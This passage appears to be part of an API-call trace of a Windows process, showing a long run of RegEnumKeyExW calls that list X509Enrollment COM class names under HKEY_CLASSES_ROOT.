lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertificateAttestationChallenge.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11c0, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertificatePolicies", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11c1, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertificatePolicies.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11c2, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertificatePolicy", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11c3, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertificatePolicy.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11c4, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertProperties", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11c5, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertProperties.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11c6, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertProperty", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11c7, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertProperty.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11c8, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyArchived", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11c9, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyArchived.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11ca, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyArchivedKeyHash", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11cb, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyArchivedKeyHash.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11cc, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyAutoEnroll", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11cd, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyAutoEnroll.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11ce, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyBackedUp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11cf, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyBackedUp.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11d0, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyDescription", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11d1, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyDescription.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11d2, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyEnrollment", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11d3, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyEnrollment.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11d4, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyEnrollmentPolicyServer", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11d5, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyEnrollmentPolicyServer.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11d6, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyFriendlyName", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11d7, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyFriendlyName.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11d8, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyKeyProvInfo", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.612] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11d9, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyKeyProvInfo.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11da, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyRenewal", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11db, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyRenewal.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11dc, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyRequestOriginator", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11dd, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertyRequestOriginator.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11de, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertySHA1Hash", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11df, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertPropertySHA1Hash.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11e0, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCryptAttribute", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11e1, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCryptAttribute.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11e2, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCryptAttributes", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11e3, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCryptAttributes.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11e4, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCspInformation", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11e5, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCspInformation.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11e6, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCspInformations", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11e7, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCspInformations.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11e8, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCspStatus", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11e9, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCspStatus.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11ea, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CObjectId", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11eb, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CObjectId.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11ec, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CObjectIds", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.613] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11ed, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CObjectIds.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11ee, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CPolicyQualifier", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11ef, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CPolicyQualifier.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11f0, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CPolicyQualifiers", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11f1, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CPolicyQualifiers.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11f2, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CSignerCertificate", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11f3, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CSignerCertificate.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11f4, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CSmimeCapabilities", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11f5, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CSmimeCapabilities.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11f6, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CSmimeCapability", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11f7, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CSmimeCapability.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11f8, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX500DistinguishedName", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11f9, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX500DistinguishedName.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11fa, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509Attribute", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11fb, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509Attribute.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11fc, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509AttributeArchiveKey", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11fd, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509AttributeArchiveKey.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11fe, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509AttributeArchiveKeyHash", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11ff, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509AttributeArchiveKeyHash.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1200, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509AttributeClientId", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.614] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1201, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509AttributeClientId.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.615] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1202, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509AttributeCspProvider", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.615] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1203, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509AttributeCspProvider.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.615] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1204, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509AttributeExtensions", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.615] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1205, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509AttributeExtensions.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.615] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1206, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509AttributeOSVersion", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.615] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1207, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509AttributeOSVersion.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.615] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1208, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509AttributeRenewalCertificate", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.615] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1209, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509AttributeRenewalCertificate.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.615] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x120a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509Attributes", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.615] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x120b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509Attributes.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.615] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x120c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CX509CertificateRequestCertificate", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.615] RegEnumKeyExW 